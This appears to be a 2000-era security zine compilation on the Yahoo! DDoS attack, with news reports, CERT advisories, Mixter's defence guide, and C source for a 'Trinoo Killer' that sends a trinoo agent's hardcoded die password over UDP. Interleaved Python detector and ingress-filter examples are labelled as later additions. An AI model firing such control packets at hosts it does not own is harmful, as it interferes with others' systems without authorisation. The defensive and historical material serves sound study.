Denial of service attacks aren't new. In fact, both the FBI and CERT issued public warnings about them last year. CERT is part of the Software Engineering Institute, a federally funded research and development center at Carnegie Mellon University. Just a few hours before the attack on Yahoo! began, denial of service attacks were discussed at a meeting of the North American Network Operators' Group, one of the main organizations for the supervisors of computer networks. "Denial of service attacks occur periodically, but they are not as common as people trying to hack into a site, since hacking in enables you to alter the site's content and post something for everyone to see," Keynote's Shklar said. Internet Security Systems' Rouland said that there are four popular denial of service attacks, called Tribal Flood Network, Trinoo, TFN2K, and Stacheldraht. Hackers plan the attack in two stages. First, they surreptitiously place software "agents" on a network of computers that may have no connection to their actual target. Once these agents are in place, the hackers can direct all of the bandwidth capacity of that network at a target web site.
"A master command wakes up the agents, identifies the target, and says go for it," Rouland said. Because these agents are installed using a backdoor method, they can be difficult to find, he said. Software that can trigger a denial of service attack is commonly traded by hackers over the Internet, said Scott Gordon, director of intrusion detection products at Axent Technologies (AXNT: Research, Estimates) in Rockville, Md., another large Internet security firm. These programs include Ping of Death and SynFlood. "It's a safe bet that other significant sites will be hit by this type of attack," Gordon said. "It may be done for boasting rights or financial gain through data theft." The FBI and the Secret Service have joint responsibility for investigating computer crimes. Large cases are coordinated by the FBI's National Infrastructure Protection Center. Scott Charney, a principal at PricewaterhouseCoopers Investigations LLC in D.C., who used to run the Justice Department's computer crimes unit, said that it could be difficult to trace who originated the attack on Yahoo!. That's because hackers often direct their traffic through several different web sites before hitting their end target. "Sophisticated hackers don't attack in a straight line," Charney said. "They weave between sites. If one of these sites strips off the source information and throws it away, there can be a break in the chain for investigators." "Global connectivity, lots of open sites, poor security at some, and lack of tracing ability create an environment where if you are up to no good, you can flourish," Charney said.

-- Reuters and the Associated Press contributed to this report

-=-

Wired #1

Was Yahoo Smurfed or Trinooed?
by Declan McCullagh
1:10 p.m. 8.Feb.2000 PST

Yahoo's agonizing three-hour crash was the most devastating reported attack of its kind in the history of the Net, but it won't be the last.
Company officials said as-yet-unknown miscreants laid siege to the Internet's second most popular destination at about 10:30 a.m. PST Monday, snarling Yahoo's internal network and denying millions of visitors access to mail, schedules, and the directory service. What's particularly disturbing: There may not have been anything Yahoo could have done to prevent it. Any Web site is vulnerable to so-called denial of service (DoS) attacks, which have grown considerably more fearsome recently. Although their methods vary, all attempt to clog the networks of the company that's being targeted, sometimes with devastating effect. "What we're seeing is adolescent pranks going mainstream," says MIT network manager Jeff Schiller. "This is the electronic equivalent. It just has much more far-reaching impact." DoS attacks are a particular favorite of malcontents, since they can be done somewhat anonymously and since they require little technical skill. Some, like "smurfing" and "fragging," are named after the software that conducts the exploit. They've long been used to cripple Internet Relay Chat and other low-profile sites -- Wired News reported on one incident in January 1998. But they can also be used to assail even some of the best-defended corporations, something that's not exactly heartening to the millions of people who now rely on the Web for calendars, scheduling, and email. One popular attack is called "smurfing." It works this way: A perpetrator sends a stream of "echo" response-requests and pretends they're coming from the victim's computer. The multiplied replies overwhelm the targeted network. They also cause havoc inside the broadcasting (aka smurf amplifying) computers that were used as unwitting reflectors. Depending on the size of the intermediate network, a clever attacker can easily increase the muscle of his assault.
A 768 Kb/s stream of echo packets multiplied by a broadcast network with 100 machines can generate a 76.8 Mb/s flood directed against the target -- more than enough to overwhelm any single computer.

The good news is that defenses against this kind of assault are well-known. Computers can be modified to ignore echo requests. Cisco and 3Com have both released instructions to turn off broadcasting of them, and Internet Engineering Task Force RFC2644 says echo requests "must" be disabled in routers by default.

Since "smurf" attacks became well-known in 1997, their threat seems to have decreased. One report says, "We have seen a reduction in average bandwidth used on a smurf attack from 80 Mbps to 5 Mbps. Additionally, there has been a [50 percent] reduction in the number of noticeable smurf attacks."

But others have evolved to take their place. A December 1999 advisory from Carnegie Mellon University's Computer Emergency Response Team describes trinoo and Tribe Flood Network (TFN) -- two programs that perform the kind of distributed denial of service attacks Yahoo said it experienced on Monday.

The design is astonishingly clever and simple. The idea: Instead of a single site launching an echo-packet-augmented attack, a large network can assault a target in a coordinated and much more destructive manner.

Both trinoo and TFN rely on a master "handler" computer that signals a network of slave "agent" machines when it's time to start an attack. The human perpetrator must have already installed the trinoo or TFN daemons on the dozens -- or even hundreds -- of machines that will participate.

The remedy is simple, as long as everyone does it: Besides the long-standing defenses against "smurf" attacks, system administrators should look for hidden copies of trinoo or TFN binaries squirreled away that might attack a remote site like Yahoo when called into action.
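An added example, not code from the Wired article or from any of the tools it names: a small Python checker that runs over constructed flow records and flags the two patterns described above, echo requests aimed at a local directed-broadcast address (a network being abused as a smurf amplifier, with the forged source being the victim the replies will hit) and UDP traffic to port 27444, the port the Trinoo Killer source later in this issue sends its command to. The local prefix, the sample addresses, the flow-record format and the reply threshold are assumptions.

```python
"""Flag smurf-amplifier abuse and trinoo control traffic in flow records.

Added example; not from the Wired article or any DDoS tool it names.
Each flow record is a constructed one-line summary:
    src dst proto info bytes
where info is the ICMP message type or the destination port.
"""
import ipaddress
from collections import defaultdict

# Assumed local network; 10.0.0.255 is its directed-broadcast address.
LOCAL_NETS = [ipaddress.ip_network("10.0.0.0/24")]

# UDP port the Trinoo Killer program in this issue sends its command to,
# i.e. where a trinoo agent listens for its handler.
TRINOO_AGENT_PORT = 27444

# Constructed sample: an outside address (the victim's, forged) pinging our
# broadcast address, two local hosts answering it, one packet to a trinoo
# agent port, and ordinary web traffic.
SAMPLE_FLOWS = """\
203.0.113.9 10.0.0.255 icmp echo-request 1500
203.0.113.9 10.0.0.255 icmp echo-request 1500
10.0.0.5 203.0.113.9 icmp echo-reply 1500
10.0.0.6 203.0.113.9 icmp echo-reply 1500
198.51.100.20 10.0.0.40 udp 27444 64
10.0.0.7 198.51.100.8 tcp 80 420
"""


def parse_flow(line):
    src, dst, proto, info, nbytes = line.split()
    return {"src": ipaddress.ip_address(src), "dst": ipaddress.ip_address(dst),
            "proto": proto, "info": info, "bytes": int(nbytes)}


def is_directed_broadcast(addr):
    return any(addr == net.broadcast_address for net in LOCAL_NETS)


def smurf_flood_rate(attacker_bps, amplifier_hosts):
    """Rate arriving at the victim: every host behind the broadcast address
    answers each forged request (the article's 768 Kb/s x 100 = 76.8 Mb/s)."""
    return attacker_bps * amplifier_hosts


def analyze(lines, reply_source_threshold=2):
    """Return sorted alert tuples for the given flow records."""
    alerts = set()
    reply_sources = defaultdict(set)   # victim -> hosts replying to it
    for line in lines:
        line = line.strip()
        if not line:
            continue
        f = parse_flow(line)
        if f["proto"] == "icmp" and f["info"] == "echo-request" \
                and is_directed_broadcast(f["dst"]):
            # Our segment is being used as an amplifier; the source address
            # is not the sender but the victim the replies will hit.
            alerts.add(("smurf-amplifier-abuse", str(f["src"]), str(f["dst"])))
        elif f["proto"] == "icmp" and f["info"] == "echo-reply":
            reply_sources[f["dst"]].add(f["src"])
        elif f["proto"] == "udp" and f["info"].isdigit() \
                and int(f["info"]) == TRINOO_AGENT_PORT:
            alerts.add(("trinoo-control", str(f["src"]), str(f["dst"])))
    for victim, sources in reply_sources.items():
        # Echo replies converging on one address from many hosts is the
        # victim-side view of a smurf; the threshold is an assumption.
        if len(sources) >= reply_source_threshold:
            alerts.add(("smurf-victim", str(victim), len(sources)))
    return sorted(alerts, key=lambda a: (a[0], a[1]))


if __name__ == "__main__":
    for alert in analyze(SAMPLE_FLOWS.splitlines()):
        print(*alert)
```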
Even newer programs have emerged that have in part replaced TFN, which seemed to have peaked in popularity around September 1999. Some of the more recent ones include stacheldraht -- German for "barbed wire" -- and an upgraded TFN2000. The threat prompted CERT to release an advisory last month.

Stacheldraht agents have been spotted on Solaris machines, and a version appears to be available for Linux as well. One big difference -- or improvement, if you're the person using it -- is that stacheldraht uses encrypted communications to cloak its intentions from administrators who might be monitoring the network.

In response, the federal government has become more involved. An alphabet soup of agencies, including the FBI's National Infrastructure Protection Center, the Critical Infrastructure Assurance Office, and FedCIRC are asking Congress for money and promising to defend the Net.

But companies that have invented the technology that runs the Net don't seem to need help in fixing problems with it. A Yahoo source close to the problem told Wired News that they hadn't contacted the Feds during their trouble yesterday because it would do no good.

Some measures the government is contemplating -- like increased surveillance of the Internet to snare wayward hackers -- alarm civil libertarians. The Electronic Privacy Information Center recently released documents it obtained that talk of increased electronic monitoring of Americans.

"We have Feds that are overreacting to this," says MIT's Schiller, a member of the IETF steering committee. What needs to happen is for outdated rules to be repealed, he said. "There needs to be a way network operators can [work together] in a way that's immune from Sherman antitrust," he said. "We had a situation at IETF where we couldn't have two people in the same room together by themselves since they were representatives of big competitors."

President Clinton's budget released Monday calls for sharply increased spending on computer security.
-=-

Wired #2

Yahoo on Trail of Site Hackers
Reuters

3:50 p.m. 8.Feb.2000 PST

SAN FRANCISCO -- Yahoo said Tuesday it was meeting with the FBI to track down hackers who brought its site to a standstill Monday, although the company expects no financial impact from the incident.

"From a financial standpoint, there isn't any impact," said a Yahoo spokeswoman.

The company's stock surged 19-1/8 to 373-1/8 along with a generally stronger Nasdaq market led by the Internet sector, as investors ignored the technical problem at the site.

Yahoo (YHOO), which generates much of its revenue through advertising, was able to reschedule its ad spots to other positions without a significant loss of revenue, the company said. But since an estimated 100 million pages would have been viewed during the two hours the site was down, the company could potentially have lost as much as $500,000, analysts said.

"We were contacted by the authorities regarding the situation that occurred yesterday and we are doing our part to work with them," said the Yahoo spokeswoman.

The company is gathering electronic data and attempting to trace the source of the flood of messages that swamped its site and led to its virtual shutdown. Yahoo declined to identify all of the authorities who were involved in the probe, but said specifically that the FBI was included.

"We will be sitting down with them over the next few days to discuss the appropriate next steps," the company said.

The attack has been narrowed to 50 Internet addresses, though computer security experts said it would take time to track any hacker or hackers sophisticated enough to have shut down Yahoo, one of the largest Internet sites.

The attack is called a distributed denial of service attack, which is a concerted move to inundate a Web site from many points. The attackers disguise their identities by going through a series of networks and using other computers to do damage.
Since computer programs are used, a single person could have launched the attack, even though it appears to be coming from many directions.

"The FBI may be able to do some back-tracking and coordination to find out who did this," said Scott Gordon, director of intrusion protection at Axent Technologies (AXNT), of Rockville, Maryland.

But investigators need to go behind the target computers to find the command center that directed the attack and, "we're not going to get an answer in the very near future," Gordon said.

Investigators noted that computer security services have been warning for some time about attacks like the one launched on Yahoo.

The protection, in such cases, is to find the source of the problem and put a block on the Internet address from entering the site. The blocker, known as a "rate filter," is aimed at putting a halt to the "mock traffic" that is jamming the target site. Yahoo installed that protection soon after the attack was launched and restored normal service by early afternoon.

Service was normal on the site Tuesday, a spokeswoman said.

Copyright © 1999-2000 Reuters Limited.

-=-

CERT:

CERT® Advisory CA-99-17 Denial-of-Service Tools

Original release date: December 28, 1999, 15:00 EST (GMT -0500)
Last Updated: December 28, 1999, 20:00 EST (GMT -0500)
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

All systems connected to the Internet can be affected by denial-of-service attacks. Tools that run on a variety of UNIX and UNIX-like systems and Windows NT systems have recently been released to facilitate denial-of-service attacks. Additionally, some MacOS systems can be used as traffic amplifiers to conduct a denial-of-service attack.

I. Description

New Distributed Denial-of-Service Tools

Recently, new techniques for executing denial-of-service attacks have been made public. A tool similar to Tribe FloodNet (TFN), called Tribe FloodNet 2K (TFN2K) was released.
Tribe FloodNet is described in http://www.cert.org/incident_notes/IN-99-07.html#tfn.

Like TFN, TFN2K is designed to launch coordinated denial-of-service attacks from many sources against one or more targets simultaneously. It includes features designed specifically to make TFN2K traffic difficult to recognize and filter, to remotely execute commands, to obfuscate the true source of the traffic, to transport TFN2K traffic over multiple transport protocols including UDP, TCP, and ICMP, and features to confuse attempts to locate other nodes in a TFN2K network by sending "decoy" packets. TFN2K is designed to work on various UNIX and UNIX-like systems and Windows NT.

TFN2K obfuscates the true source of attacks by spoofing IP addresses. In networks that employ ingress filtering as described in [1], TFN2K can forge packets that appear to come from neighboring machines.

Like TFN, TFN2K can flood networks by sending large amounts of data to the victim machine. Unlike TFN, TFN2K includes attacks designed to crash or introduce instabilities in systems by sending malformed or invalid packets. Some attacks like this are described in

http://www.cert.org/advisories/CA-98-13-tcp-denial-of-service.html
http://www.cert.org/advisories/CA-97.28.Teardrop_Land.html

Also like TFN, TFN2K uses a client-server architecture in which a single client, under the control of an attacker, issues commands simultaneously to a set of TFN2K servers. The servers then conduct the denial-of-service attacks against the victim(s). Installing the server requires that an intruder first compromise a machine by different means.

Asymmetric traffic from MacOS 9

MacOS 9 can be abused by an intruder to generate a large volume of traffic directed at a victim in response to a small amount of traffic produced by an intruder. This allows an intruder to use MacOS 9 as a "traffic amplifier," and flood victims with traffic.
According to [3], an intruder can use this asymmetry to "amplify" traffic by a factor of approximately 37.5, thus enabling an intruder with limited bandwidth to flood a much larger connection. This is similar in effect and structure to a "smurf" attack, described in

http://www.cert.org/advisories/CA-98.01.smurf.html

Unlike a smurf attack, however, it is not necessary to use a directed broadcast to achieve traffic amplification.

II. Impact

Intruders can flood networks with overwhelming amounts of traffic or cause machines to crash or otherwise become unstable.

III. Solution

The problem of distributed denial-of-service attacks is discussed at length in [2], available at

http://www.cert.org/reports/dsit_workshop.pdf

Managers, system administrators, Internet Service Providers (ISPs) and Computer Security Incident Response Teams (CSIRTs) are encouraged to read this document to gain a broader understanding of the problem.

For the ultimate victim of distributed denial-of-service attacks

Preparation is crucial. The victim of a distributed denial-of-service attack has little recourse using currently available technology to respond to an attack in progress. According to [2]:

    The impact upon your site and operations is dictated by the (in)security of other sites and the ability of a remote attacker to implant the tools and subsequently to control and direct multiple systems worldwide to launch an attack.

Sites are strongly encouraged to develop the relationships and capabilities described in [2] before you are a victim of a distributed denial-of-service attack.

For all Internet Sites

System and network administrators are strongly encouraged to follow the guidelines listed in [2]. In addition, sites are encouraged to implement ingress filtering as described in [1]. CERT/CC recommends implementing such filtering on as many routers as practical.
This method is not foolproof, as mentioned in [1]:

    While the filtering method discussed in this document does absolutely nothing to protect against flooding attacks which originate from valid prefixes (IP addresses), it will prohibit an attacker within the originating network from launching an attack of this nature using forged source addresses that do not conform to ingress filtering rules.

Because TFN2K implements features designed specifically to take advantage of the granularity of ingress filtering rules, the method described in [1] means that sites may only be able to determine the network or subnet from which an attack originated.

Sites using manageable hubs or switches that can track which IP addresses have been seen at a particular port or which can restrict which MAC addresses can be used on a particular port may be able to further identify which machine(s) is responsible for TFN2K traffic. For further information, consult the documentation for your particular hub or switch.

The widespread use of this type of filtering can significantly reduce the ability of intruders to use spoofed packets to compromise or disrupt systems.

Preventing your site from being used by intruders

TFN2K and similar tools rely on the ability of intruders to install the client. Preventing your system from being used to install the client will help prevent intruders from using your systems to launch denial-of-service attacks (in addition to whatever damage they may cause to your systems).

Popular recent attacks can be found at

http://www.cert.org/current/current_activity.html

Sites are encouraged to regularly visit this page and address any issues found there.

For the "Mac Attack"

Apple has developed a patch, as described in Appendix A. Please see the information there.

Appendix A contains information provided by vendors for this advisory. We will update the appendix as we receive or develop more information.
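An added example of the ingress filtering the Solution section recommends, written here and not taken from CERT, RFC2267 or any router vendor: a border router forwards a packet from a customer interface only if its source address lies in a prefix assigned to that interface. The constructed packets include the case the advisory warns about, a source forged from a neighbouring address inside the same prefix, which the filter cannot stop, so a forwarded packet can be traced only to its originating network or subnet. The interface names, prefixes and addresses are assumptions.

```python
"""RFC2267-style ingress filtering at a provider border, with the caveat
CA-99-17 raises about TFN2K.

Added example, not CERT's or any router vendor's code. A packet that
arrives on a customer interface is forwarded only if its source address
lies inside a prefix assigned to that interface. The interface names,
prefixes and packets below are constructed.
"""
import ipaddress

# Assumed topology: interface -> prefixes legitimately reachable behind it.
INTERFACE_PREFIXES = {
    "customer-a": [ipaddress.ip_network("192.0.2.0/24")],
    "customer-b": [ipaddress.ip_network("198.51.100.0/25"),
                   ipaddress.ip_network("198.51.100.128/26")],
}

# Constructed packets: (arrival interface, source address written in the
# packet, the host that really sent it, destination). The real sender is
# known only because we built the sample; a router never sees it.
SAMPLE_PACKETS = [
    ("customer-a", "192.0.2.10",  "192.0.2.10", "10.0.0.40"),   # honest
    ("customer-a", "203.0.113.9", "192.0.2.10", "10.0.0.40"),   # forged, foreign prefix
    ("customer-a", "192.0.2.77",  "192.0.2.10", "10.0.0.40"),   # forged neighbour (TFN2K style)
    ("unknown-if", "192.0.2.10",  "192.0.2.10", "10.0.0.40"),   # no rule for this interface
]


def ingress_allowed(interface, src):
    """The RFC2267 check: the source must belong to the arrival interface."""
    prefixes = INTERFACE_PREFIXES.get(interface)
    if prefixes is None:
        return False                      # unconfigured interface: fail closed
    addr = ipaddress.ip_address(src)
    return any(addr in p for p in prefixes)


def evaluate(packets):
    """Apply the filter and record whether each forgery was actually stopped."""
    results = []
    for iface, claimed, real, dst in packets:
        verdict = "forward" if ingress_allowed(iface, claimed) else "drop"
        spoofed = claimed != real
        results.append({"iface": iface, "src": claimed, "dst": dst,
                        "verdict": verdict, "spoofed": spoofed,
                        "spoof_stopped": spoofed and verdict == "drop"})
    return results


def originating_prefix(interface, src):
    """What a defender can still conclude about a forwarded packet: the
    narrowest assigned prefix the source lies in, i.e. the network or
    subnet it came from, never the exact host."""
    addr = ipaddress.ip_address(src)
    matches = [p for p in INTERFACE_PREFIXES.get(interface, []) if addr in p]
    return max(matches, key=lambda p: p.prefixlen) if matches else None


if __name__ == "__main__":
    for r in evaluate(SAMPLE_PACKETS):
        note = ("spoof stopped" if r["spoof_stopped"]
                else "forgery passed" if r["spoofed"] else "")
        print(r["iface"], r["src"], r["verdict"], note)
```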
If you do not see your vendor's name in Appendix A, the CERT/CC did not hear from that vendor. Please contact your vendor directly.

Appendix A. Vendor Information

Apple Computer

OT Tuner 1.0 switches off an option in Open Transport that would cause a Macintosh to respond to certain small network packets with a large Internet Control Message Protocol (ICMP) packet. This update prevents Macintosh computers from being the cause of certain types of Denial of Service (DOS) issues. The update is available from our software update server at

http://asu.info.apple.com/swupdates.nsf/artnum/n11559

In addition, it will soon be available via the automatic update feature that is part of Mac OS 9.

References

[1] RFC2267, Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing, P. Ferguson, D. Senie, The Internet Society, January, 1998, available at http://info.internet.isi.edu:80/in-notes/rfc/files/rfc2267.txt

[2] Results of the Distributed-Systems Intruder Tools Workshop, The CERT Coordination Center, December, 1999, available at http://www.cert.org/reports/dsit_workshop.pdf

[3] The "Mac Attack," a Scheme for Blocking Internet Connections, John A. Copeland, December, 1999, available at http://www.csc.gatech.edu/~copeland. Temporary alternate URL: http://people.atl.mediaone.net/jacopeland

The CERT Coordination Center thanks Jeff Schiller of the Massachusetts Institute of Technology, Professor John Copeland and Jim Hendricks of the Georgia Institute of Technology, Jim Ellis of Sun Microsystems, Wietse Venema of IBM, Rick Forno of Network Solutions, Inc., Dave Dittrich of the University of Washington, Steve Bellovin of AT&T, Jim Duncan and John Bashinski of Cisco Systems, and MacInTouch for input and technical assistance used in the construction of this advisory.
This document is available from:
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
    CERT® Coordination Center
    Software Engineering Institute
    Carnegie Mellon University
    Pittsburgh PA 15213-3890
    U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/

To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in

http://www.cert.org/legal_stuff.html

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.
Revision History

December 28, 1999: Initial release
December 28, 1999: Added information regarding a patch from Apple

-=-

CERT:

CERT® Advisory CA-2000-01 Denial-of-Service Developments

This advisory is being published jointly by the CERT Coordination Center and the Federal Computer Incident Response Capability (FedCIRC).

Original release date: January 3, 2000
Source: CERT/CC and FedCIRC

A complete revision history is at the end of this file.

Systems Affected

All systems connected to the Internet can be affected by denial-of-service attacks.

I. Description

Continued Reports of Denial-of-Service Problems

We continue to receive reports of new developments in denial-of-service tools. This advisory provides pointers to documents discussing some of the more recent attacks and methods to detect some of the tools currently in use.

Many of the denial-of-service tools currently in use depend on the ability of an intruder to compromise systems first. That is, intruders exploit known vulnerabilities to gain access to systems, which they then use to launch further attacks. For information on how to protect your systems, see the solution section below. Security is a community effort that requires diligence and cooperation from all sites on the Internet.

Recent Denial-of-Service Tools and Developments

One recent report can be found in CERT Advisory CA-99-17.

A distributed denial-of-service tool called "Stacheldraht" has been discovered on multiple compromised hosts at several organizations. In addition, one organization reported what appears to be more than 100 different connections to various Stacheldraht agents.
At the present time, we have not been able to confirm that these are connections to Stacheldraht agents, though they are consistent with an analysis provided by Dave Dittrich of the University of Washington, available at

http://staff.washington.edu/dittrich/misc/stacheldraht.analysis

Also, Randy Marchany of Virginia Tech released an analysis of a TFN-like toolkit, available at

http://www.sans.org/y2k/TFN_toolkit.htm

The ISS X-Force Security Research Team published information about trin00 and TFN in their December 7 Advisory, available at

http://xforce.iss.net/alerts/advise40.php3

A general discussion of denial-of-service attacks can be found in a CERT/CC Tech Tip available at

http://www.cert.org/tech_tips/denial_of_service.html

II. Impact

Denial-of-service attacks can severely limit the ability of an organization to conduct normal business on the Internet.

III. Solution

Solutions to this problem fall into a variety of categories.

Awareness

We urge all sites on the Internet to be aware of the problems presented by denial-of-service attacks. In particular, keep the following points in mind:

Security on the Internet is a community effort. Your security depends on the overall security of the Internet in general. Likewise, your security (or lack thereof) can cause serious harm to others, even if intruders do no direct harm to your organization. Similarly, machines that are not part of centralized computing facilities and that may be managed by novice or part-time system administrators or may be unmanaged, can be used by intruders to inflict harm on others, even if those systems have no strategic value to your organization.

Systems used by intruders to execute denial-of-service attacks are often compromised via well-known vulnerabilities. Keep up-to-date with patches and workarounds on all systems.

Intruders often use source-address spoofing to conceal their location when executing denial-of-service attacks.
We urge all sites to implement ingress filtering to reduce source address spoofing on as many routers as possible. For more information, see RFC2267.

Because your security is dependent on the overall security of the Internet, we urge you to consider the effects of an extended network or system outage and make appropriate contingency plans where possible.

Responding to a denial-of-service attack may require the cooperation of multiple parties. We urge all sites to develop the relationships and capabilities described in the results of our recent workshop before you are a victim of a distributed denial-of-service attack. This document is available at

http://www.cert.org/reports/dsit_workshop.pdf

Detection

A variety of tools are available to detect, eliminate, and analyze distributed denial-of-service tools that may be installed on your network.

The National Infrastructure Protection Center has recently announced a tool to detect trin00 and TFN on some systems. For more information, see

http://www.fbi.gov/nipc/trinoo.htm

Part of the analysis done by Dave Dittrich includes a Perl script named gag which can be used to detect stacheldraht agents running on your local network. See Appendix A of that analysis for more information.

Internet Security Systems released updates to some of their tools to aid sites in detecting trin00 and TFN. For more information, see

http://www.iss.net/cgi-bin/dbt-display.exe/db_data/press_rel/release/122899199.plt

Prevention

We urge all sites to follow sound security practices on all Internet-connected systems. For helpful information, please see

http://www.cert.org/security-improvement
http://www.sans.org

Response

For information on responding to intrusions when they do occur, please see

http://www.cert.org/nav/recovering.html
http://www.sans.org/newlook/publications/incident_handling.htm

The United States Federal Bureau of Investigation is conducting criminal investigations involving TFN where systems appear to have been compromised. U.S.
recipients are encouraged to contact their local FBI Office.

We thank Dave Dittrich of the University of Washington, Randy Marchany of Virginia Tech, Internet Security Systems, UUNet, the Y2K-ICC, the National Infrastructure Protection Center, Alan Paller and Steve Northcutt of The SANS Institute, The MITRE Corporation, Jeff Schiller of The Massachusetts Institute of Technology, Jim Ellis of Sun Microsystems, Vern Paxson of Lawrence Berkeley National Lab, and Richard Forno of Network Solutions.

This document is available from:
http://www.cert.org/advisories/CA-2000-01.html

Copyright 2000 Carnegie Mellon University. Conditions for use, disclaimers, and sponsorship information can be found in

http://www.cert.org/legal_stuff.html

@HWA

116.0 Trinoo Killer Source Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: PSS http://packetstorm.securify.com/

    /*
     * AFRO-PRODUCTIONS.COM
     *
     * By your buddies at afro productions!
     *
     * This program kills trino nodes on version 1.07b2+f3 and below.
     *
     * It sends the trinoo daemon's "die" command (with the password the
     * daemon expects) as a single UDP datagram to the port the daemon
     * listens on.
     */

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>          /* strlen(), memcpy(), memset() */
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    #define KILL "d1e l44adsl d1e\n"

    int main(int argc, char **argv)
    {
        int sock;
        struct sockaddr_in s;
        struct hostent *h;
        char *host;

        if (argc == 1) {
            fprintf(stdout, "Usage: %s <ip>\n", argv[0]);
            return 0;
        }
        host = argv[1];

        sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if (sock < 0) {
            perror("socket");
            return 1;
        }

        memset(&s, 0, sizeof(s));
        s.sin_family = AF_INET;
        s.sin_addr.s_addr = inet_addr(host);
        s.sin_port = htons(27444);      /* UDP port the trinoo daemon listens on */

        /* inet_addr() returns INADDR_NONE (not -1) when the argument is
         * not a dotted quad; fall back to a name lookup in that case. */
        if (s.sin_addr.s_addr == INADDR_NONE) {
            h = gethostbyname(host);
            if (!h) {
                fprintf(stdout, "%s is an invalid target.\n", host);
                return 1;
            }
            memcpy(&s.sin_addr.s_addr, h->h_addr, h->h_length);
        }

        if (sendto(sock, KILL, strlen(KILL), 0,
                   (struct sockaddr *)&s, sizeof(s)) < 0) {
            perror("sendto");
            return 1;
        }
        fprintf(stdout, "Packet sent to target %s.\n", host);
        return 0;
    }

@HWA

117.0 Mixter's guide to defending against DDoS attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

10 Proposed 'first-aid' security measures against Distributed Denial Of Service attacks
---------------------------------------------------------------------------------------

To say the least, coping with all the causes and security vulnerabilities that can be exploited for compromising hosts and launching Denial Of Service from them is very complex.
In the long term, there is no simple, single method for protecting against such attacks; instead, extensive security and protection measures will have to be applied. For everyone whose systems are currently at risk, or who is generally worried, I am compiling a small list of easy and fast to implement methods to protect against those attacks.

- Mixter

Important things to do as a current or potential victim of packet flooding Denial Of Service:

1) Avoid FUD

FUD stands for fear, uncertainty, and doubt. The recent attacks have obviously been launched with provoking hysteria and overreactions in mind, due to the victims that have been targeted. It is very important to realize that only a small number of companies and hosts have to fear becoming a victim of Denial Of Service. Those include top-profile sites like search engines, the most popular e-commerce and stock companies, IRC chat servers, as well as news magazines (for obvious purposes). If you are not amongst them, there is little reason for you to worry about becoming a direct target of DoS attacks.

2) Arrange with your Internet uplink provider(s)

It is very important that you have the assistance and cooperation of your direct backbone and uplink network providers. The bandwidth used in DDoS attacks is so major that your own network probably cannot handle it, regardless of what you try. Talk to your uplinks, and make sure that they agree to help you with implementing routing access control that limits the amount of bandwidth and the number of different source addresses that are let through to your network at once. Ideally, your uplink should be willing to monitor or let you access their routers in the case of an actual attack.

3) Optimize your routing and network structure

If you don't have only a host, but a bigger network, then tune your routers to minimize the impact of DoS attacks. To prevent SYN flooding attacks, set up the TCP interception feature.
Details about this can be found at http://www.cisco.com or at your router manufacturer's hotline. Block the kinds of UDP and ICMP messages that your network doesn't require to operate. Especially permitting outgoing ICMP unreach messages could multiply the impact of a packet flooding attack.

4) Optimize your most important publicly accessible hosts

Do the same on the hosts that can be potential targets. Deny all traffic that isn't explicitly needed for the servers you run. Additionally, multi-homing (assigning many different IPs to the same hostname) will make it a lot harder for the attacker. I suggest that you multi-home your web site to many physically different machines, while the HTML index site on those machines may only contain a forwarding entry to the pages on your actual, original web server.

5) During ongoing attacks: start countermeasures as soon as possible

It is important that you start the backtracking of packets as soon as possible, and contact any further uplink providers when traces indicate that the packet storm came over their networks. Don't rely on the source addresses, as they can practically be chosen arbitrarily in DoS attacks. The overall effort of being able to determine the origins of spoofed DoS attacks depends on your quick action, as the router entries that allow traffic backtracking will expire a short time after the flood is halted.

Important things to do as a current or potential victim of security compromise, break-in, and flood agent installation:

6) Avoid FUD

As a potential victim of a compromise, you should as well try not to overreact; instead take rational and effective actions fast. Note that the current Denial Of Service servers have only proven to be written for and installed on Linux and Solaris systems. They are probably portable to *BSD* systems, but since those are usually more secure, it should not be a big problem.
7) Assure that your hosts are not compromised and are secure

There are many recent vulnerability exploits, and a lot more older exploits out. Check exploit databases, for example at securityfocus.com or packetstorm.securify.com, to make sure that the versions of your server software are not proven to be vulnerable. Remember, intruders HAVE TO use existing vulnerabilities to be able to get into your systems and install their programs. You should be reviewing your server configuration, looking for security glitches, running recently updated software versions, and, this is most important, be running the minimum of services that you really need. If you follow all of these guidelines, you can consider yourself to be secure and protected from compromises to a reasonable extent.

8) Audit your systems regularly

Realize that you are responsible for your own systems, and for what is happening with them. Learn enough about how your system and your server software operate, and review your configuration and the security measures that you apply frequently. Check full disclosure security sites for new vulnerabilities and weaknesses that might be discovered in the future in your operating system and server software.

9) Use cryptographic checking

On a system on which you have verified that it has not already been broken into or compromised, you are urged to set up a system that generates cryptographic signatures of all your binary and other trusted system files, and compare the changes to those files periodically. Additionally, using a system where you store the actual checksums on a different machine or removable media, to which a remote attacker cannot have access, is strongly recommended. Tools that do this, e.g. tripwire, can be found on security sites like packetstorm.securify.com and most public open source ftp archives. Commercial packages are also available, if you prefer them.
